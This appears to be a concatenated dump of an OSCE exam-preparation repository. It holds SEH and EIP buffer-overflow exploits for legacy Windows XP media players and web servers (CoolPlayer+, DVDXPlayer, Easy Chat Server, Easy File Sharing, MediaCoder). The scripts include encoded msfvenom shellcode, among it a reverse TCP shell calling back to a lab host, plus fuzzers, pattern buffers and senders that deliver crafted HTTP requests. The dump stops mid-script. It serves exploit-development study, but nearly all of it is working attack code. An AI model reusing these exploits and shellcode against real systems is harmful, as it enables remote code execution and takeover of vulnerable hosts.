#msfvenom -a x86 -p windows/exec CMD=calc.exe -e x86/shikata_ga_nai -b '\x00\x0a\x0d\xff' -f perl 10 | 11 | my $shell = "\xbb\xa4\x12\xda\x1e\xda\xc5\xd9\x74\x24\xf4\x5f\x29\xc9" . 12 | "\xb1\x31\x31\x5f\x13\x83\xef\xfc\x03\x5f\xab\xf0\x2f\xe2" . 13 | "\x5b\x76\xcf\x1b\x9b\x17\x59\xfe\xaa\x17\x3d\x8a\x9c\xa7" . 14 | "\x35\xde\x10\x43\x1b\xcb\xa3\x21\xb4\xfc\x04\x8f\xe2\x33" . 15 | "\x95\xbc\xd7\x52\x15\xbf\x0b\xb5\x24\x70\x5e\xb4\x61\x6d" . 16 | "\x93\xe4\x3a\xf9\x06\x19\x4f\xb7\x9a\x92\x03\x59\x9b\x47" . 17 | "\xd3\x58\x8a\xd9\x68\x03\x0c\xdb\xbd\x3f\x05\xc3\xa2\x7a" . 18 | "\xdf\x78\x10\xf0\xde\xa8\x69\xf9\x4d\x95\x46\x08\x8f\xd1" . 19 | "\x60\xf3\xfa\x2b\x93\x8e\xfc\xef\xee\x54\x88\xeb\x48\x1e" . 20 | "\x2a\xd0\x69\xf3\xad\x93\x65\xb8\xba\xfc\x69\x3f\x6e\x77" . 21 | "\x95\xb4\x91\x58\x1c\x8e\xb5\x7c\x45\x54\xd7\x25\x23\x3b" . 22 | "\xe8\x36\x8c\xe4\x4c\x3c\x20\xf0\xfc\x1f\x2e\x07\x72\x1a" . 23 | "\x1c\x07\x8c\x25\x30\x60\xbd\xae\xdf\xf7\x42\x65\xa4\x08" . 24 | "\x09\x24\x8c\x80\xd4\xbc\x8d\xcc\xe6\x6a\xd1\xe8\x64\x9f" . 25 | "\xa9\x0e\x74\xea\xac\x4b\x32\x06\xdc\xc4\xd7\x28\x73\xe4" . 26 | "\xfd\x4a\x12\x76\x9d\xa2\xb1\xfe\x04\xbb"; 27 | 28 | my $nops = "\x90" x (260 - ((length($jmp) + length($shell)))); #260 is offset to eip 29 | my $eip = pack('V', 0x7c810395); #call ebx from kernel32.dll 30 | 31 | my $sploit = $jmp.$nops.$shell.$eip; #build sploit portion of buffer 32 | my $fill = "\x43" x ($buffsize - (length($sploit))); # fill remainder of buffer for size consistency 33 | my $buffer = $sploit.$fill; # build final buffer 34 | 35 | # write the exploit buffer to file 36 | 37 | my $file = "coolplayershell_subregjump_calc.m3u"; 38 | open(FILE, ">$file"); 39 | print FILE $buffer; 40 | close(FILE); 41 | print "Exploit file created [" . $file . "]\n"; 42 | print "Buffer size: " . length($buffer). "\n"; 43 | -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/coolplayer+ v2.19.4/sub(reg)+jmp/coolplayershell_subregjump_calc.m3u: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/SEH-BoF/windows_xp_sp3/coolplayer+ v2.19.4/sub(reg)+jmp/coolplayershell_subregjump_calc.m3u -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/dvdxplayer/dvdxplayer_crash.plf: -------------------------------------------------------------------------------- 1 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/dvdxplayer/dvdxplayer_crash.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python -w 2 | 3 | filename="dvdxplayer_crash.plf" 4 | 5 | buffer = "A"*2000 6 | 7 | textfile = open(filename, 'w') 8 | textfile.write(buffer) 9 | textfile.close() 10 | -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/dvdxplayer/dvdxplayer_patt_nSEH.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python -w 2 | 3 | filename="dvdxplayer_patt_nSEH.plf" 4 | 5 | #---------------------------------------------------------------------------# 6 | # (*) badchars = '\x00\x0A\x0D\x1A' # 7 | # # 8 | # offset to: (2) nseh 608-bytes, (1) seh 112-bytes # 9 | # (2) nseh = ???? # 10 | # (1) seh = 0x61617619 : pop esi # pop edi # ret | EPG.dll # 11 | # (3) shellcode space = 1384-bytes # 12 | #---------------------------------------------------------------------------# 13 | 14 | buffer = "A"*608 + "B"*4 + "\x19\x76\x61\x61" + "D"*1384 15 | 16 | textfile = open(filename, 'w') 17 | textfile.write(buffer) 18 | textfile.close() 19 | -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/dvdxplayer/dvdxplayer_patt_nSEH_SEH.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python -w 2 | 3 | filename="dvdxplayer_patt_nSEH.plf" 4 | 5 | #---------------------------------------------------------------------------# 6 | # (*) badchars = '\x00\x0A\x0D\x1A' # 7 | # # 8 | # offset to: (2) nseh 608-bytes, (1) seh 112-bytes # 9 | # (2) nseh = ???? # 10 | # (1) seh = 0x61617619 : pop esi # pop edi # ret | EPG.dll # 11 | # (3) shellcode space = 1384-bytes # 12 | #---------------------------------------------------------------------------# 13 | 14 | buffer = "A"*608 + "\xEB\x06\x90\x90" + "\x19\x76\x61\x61" + "D"*1384 15 | 16 | textfile = open(filename, 'w') 17 | textfile.write(buffer) 18 | textfile.close() 19 | -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/dvdxplayer/dvdxplayer_patt_overwrite.plf: -------------------------------------------------------------------------------- 1 | Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/dvdxplayer/dvdxplayer_patt_shellcode.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python -w 2 | 3 | filename="dvdxplayer_patt_shellcode.plf" 4 | 5 | #msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=172.16.73.129 #LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x1a' -f #c 6 | 7 | shellcode = ("\xbb\xe8\xe1\x4f\xb9\xda\xd6\xd9\x74\x24\xf4\x5a\x33\xc9\xb1" 8 | "\x52\x31\x5a\x12\x03\x5a\x12\x83\x02\x1d\xad\x4c\x2e\x36\xb0" 9 | "\xaf\xce\xc7\xd5\x26\x2b\xf6\xd5\x5d\x38\xa9\xe5\x16\x6c\x46" 10 | "\x8d\x7b\x84\xdd\xe3\x53\xab\x56\x49\x82\x82\x67\xe2\xf6\x85" 11 | "\xeb\xf9\x2a\x65\xd5\x31\x3f\x64\x12\x2f\xb2\x34\xcb\x3b\x61" 12 | "\xa8\x78\x71\xba\x43\x32\x97\xba\xb0\x83\x96\xeb\x67\x9f\xc0" 13 | "\x2b\x86\x4c\x79\x62\x90\x91\x44\x3c\x2b\x61\x32\xbf\xfd\xbb" 14 | "\xbb\x6c\xc0\x73\x4e\x6c\x05\xb3\xb1\x1b\x7f\xc7\x4c\x1c\x44" 15 | "\xb5\x8a\xa9\x5e\x1d\x58\x09\xba\x9f\x8d\xcc\x49\x93\x7a\x9a" 16 | "\x15\xb0\x7d\x4f\x2e\xcc\xf6\x6e\xe0\x44\x4c\x55\x24\x0c\x16" 17 | "\xf4\x7d\xe8\xf9\x09\x9d\x53\xa5\xaf\xd6\x7e\xb2\xdd\xb5\x16" 18 | "\x77\xec\x45\xe7\x1f\x67\x36\xd5\x80\xd3\xd0\x55\x48\xfa\x27" 19 | "\x99\x63\xba\xb7\x64\x8c\xbb\x9e\xa2\xd8\xeb\x88\x03\x61\x60" 20 | "\x48\xab\xb4\x27\x18\x03\x67\x88\xc8\xe3\xd7\x60\x02\xec\x08" 21 | "\x90\x2d\x26\x21\x3b\xd4\xa1\xe2\xac\x9f\xb0\x93\xce\x1f\xa2" 22 | "\x3f\x46\xf9\xae\xaf\x0e\x52\x47\x49\x0b\x28\xf6\x96\x81\x55" 23 | "\x38\x1c\x26\xaa\xf7\xd5\x43\xb8\x60\x16\x1e\xe2\x27\x29\xb4" 24 | "\x8a\xa4\xb8\x53\x4a\xa2\xa0\xcb\x1d\xe3\x17\x02\xcb\x19\x01" 25 | "\xbc\xe9\xe3\xd7\x87\xa9\x3f\x24\x09\x30\xcd\x10\x2d\x22\x0b" 26 | "\x98\x69\x16\xc3\xcf\x27\xc0\xa5\xb9\x89\xba\x7f\x15\x40\x2a" 27 | "\xf9\x55\x53\x2c\x06\xb0\x25\xd0\xb7\x6d\x70\xef\x78\xfa\x74" 28 | "\x88\x64\x9a\x7b\x43\x2d\xaa\x31\xc9\x04\x23\x9c\x98\x14\x2e" 29 | "\x1f\x77\x5a\x57\x9c\x7d\x23\xac\xbc\xf4\x26\xe8\x7a\xe5\x5a" 30 | "\x61\xef\x09\xc8\x82\x3a") 31 | 32 | evil = "\x90"*20 + shellcode 33 | buffer += "A"*608 + "\xEB\x06\x90\x90" + "\x19\x76\x61\x61" + "B"*(1384-len(evil)) 34 | 35 | textfile = open(filename, 'w') 36 | textfile.write(buffer) 37 | textfile.close() 38 | -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/easychatserver/easychatserver_eip_fuzz.py: -------------------------------------------------------------------------------- 1 | import string, sys 2 | import socket, httplib 3 | 4 | buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B" 5 | 6 | url = "/chat.ghp?username=" + buffer + "&password=" + buffer + "&room=1&sex=2" 7 | 8 | print "Running...\r\n" 9 | print url 10 | 11 | conn = httplib.HTTPConnection("172.16.73.129",80) 12 | conn.request("GET", url) 13 | r1 = conn.getresponse() 14 | print r1.status, r1.reason 15 | conn.close() 16 | -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/easychatserver/easychatserver_fuzz.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import string, sys 4 | import socket, httplib 5 | 6 | buffer = "A"*2000 7 | 8 | url = "/chat.ghp?username=" + buffer + "&password=" + buffer + "&room=1&sex=2" 9 | 10 | print "Running...\r\n" 11 | print url 12 | 13 | conn = httplib.HTTPConnection("172.16.73.129",80) 14 | conn.request("GET", url) 15 | r1 = conn.getresponse() 16 | print r1.status, r1.reason 17 | conn.close() 18 | -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/easychatserver/easychatserver_fuzz2.py: -------------------------------------------------------------------------------- 1 | import string, sys 2 | import socket, httplib 3 | 4 | buffer = "A"*220 5 | buffer += "\xEF\xBE\xAD\xDE" 6 | buffer += "B"*500 7 | 8 | url = "/chat.ghp?username=" + buffer + "&password=" + buffer + "&room=1&sex=2" 9 | 10 | print "Running...\r\n" 11 | print url 12 | 13 | conn = httplib.HTTPConnection("172.16.73.129",80) 14 | conn.request("GET", url) 15 | r1 = conn.getresponse() 16 | print r1.status, r1.reason 17 | conn.close() 18 | -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/easychatserver/easychatserver_overwrite_SEH.py: -------------------------------------------------------------------------------- 1 | import string, sys 2 | import socket, httplib 3 | 4 | buffer = "A"*216 5 | buffer += "B"*4 6 | buffer += "C"*500 7 | 8 | url = "/chat.ghp?username=" + buffer + "&password=" + buffer + "&room=1&sex=2" 9 | 10 | print "Running...\r\n" 11 | print url 12 | 13 | conn = httplib.HTTPConnection("172.16.73.129",80) 14 | conn.request("GET", url) 15 | r1 = conn.getresponse() 16 | print r1.status, r1.reason 17 | conn.close() 18 | -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/easychatserver/easychatserver_shortjump.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import string, sys 4 | import socket, httplib 5 | 6 | buffer = "A"*216 7 | buffer += "\xEB\x06\x90\x90" #jump 6 bytes forward to our exploit code 8 | buffer += "\xD9\xC6\xBA\x7C" #pop,pop,ret 9 | buffer += "B"*500 10 | 11 | url = "/chat.ghp?username=" + buffer + "&password=" + buffer + "&room=1&sex=2" 12 | 13 | print "Running...\r\n" 14 | print url 15 | 16 | conn = httplib.HTTPConnection("172.16.73.129",80) 17 | conn.request("GET", url) 18 | r1 = conn.getresponse() 19 | print r1.status, r1.reason 20 | conn.close() 21 | -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/easyfilesharing_webserver/easyfilesharing_shellcode_calc_get.py: -------------------------------------------------------------------------------- 1 | #!/usr/share/python 2 | 3 | import socket 4 | import sys 5 | 6 | host = str(sys.argv[1]) 7 | port = int(sys.argv[2]) 8 | 9 | a = socket.socket() 10 | 11 | print "Connecting to: " + host + ":" + str(port) 12 | a.connect((host,port)) 13 | 14 | entire=4500 15 | 16 | # Junk 17 | buff = "A"*4061 18 | 19 | # Next SEH 20 | buff+= "\xeb\x0A\x90\x90" 21 | 22 | # pop pop ret 23 | buff+= "\x98\x97\x01\x10" 24 | 25 | buff+= "\x90"*19 26 | 27 | # calc.exe 28 | # Bad Characters: \x20 \x2f \x5c 29 | shellcode = ( 30 | "\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9" 31 | "\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56" 32 | "\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9" 33 | "\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97" 34 | "\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64" 35 | "\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8" 36 | "\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a" 37 | "\x1c\x39\xbd" 38 | ) 39 | buff+= shellcode 40 | 41 | buff+= "\x90"*7 42 | 43 | buff+= "A"*(4500-4061-4-4-20-len(shellcode)-20) 44 | 45 | # GET 46 | a.send("GET " + buff + " HTTP/1.0\r\n\r\n") 47 | 48 | a.close() 49 | 50 | print "Done..." 51 | -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/easyfilesharing_webserver/easyfilesharing_shellcode_calc_head.py: -------------------------------------------------------------------------------- 1 | #!/usr/share/python 2 | 3 | import socket 4 | import sys 5 | 6 | host = str(sys.argv[1]) 7 | port = int(sys.argv[2]) 8 | 9 | a = socket.socket() 10 | 11 | print "Connecting to: " + host + ":" + str(port) 12 | a.connect((host,port)) 13 | 14 | entire=4500 15 | 16 | # Junk 17 | buff = "A"*4061 18 | 19 | # Next SEH 20 | buff+= "\xeb\x0A\x90\x90" 21 | 22 | # pop pop ret 23 | buff+= "\x98\x97\x01\x10" 24 | 25 | buff+= "\x90"*19 26 | 27 | # calc.exe 28 | # Bad Characters: \x20 \x2f \x5c 29 | shellcode = ( 30 | "\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9" 31 | "\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56" 32 | "\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9" 33 | "\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97" 34 | "\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64" 35 | "\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8" 36 | "\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a" 37 | "\x1c\x39\xbd" 38 | ) 39 | buff+= shellcode 40 | 41 | buff+= "\x90"*7 42 | 43 | buff+= "A"*(4500-4061-4-4-20-len(shellcode)-20) 44 | 45 | # HEAD 46 | a.send("HEAD " + buff + " HTTP/1.0\r\n\r\n") 47 | 48 | a.close() 49 | 50 | print "Done..." -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/mediacoder_0.8.43.5830/foo.m3u: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/SEH-BoF/windows_xp_sp3/mediacoder_0.8.43.5830/foo.m3u -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/mediacoder_0.8.43.5830/mediacoder_b_takeover.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | buff = "http:// " 4 | buff += "A"*776 5 | buff += "B"*4 6 | buff += "C"*1000 7 | 8 | fo = open("foo.m3u", "wb") 9 | fo.write (buff) 10 | fo.close() 11 | -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/mediacoder_0.8.43.5830/mediacoder_crash.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | buff = "http:// " 4 | buff += "A" * 1000 5 | 6 | fo = open("foo.m3u", "wb") 7 | fo.write (buff) 8 | fo.close() -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/mediacoder_0.8.43.5830/mediacoder_eip_crash.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | buff = "http:// " 4 | buff += 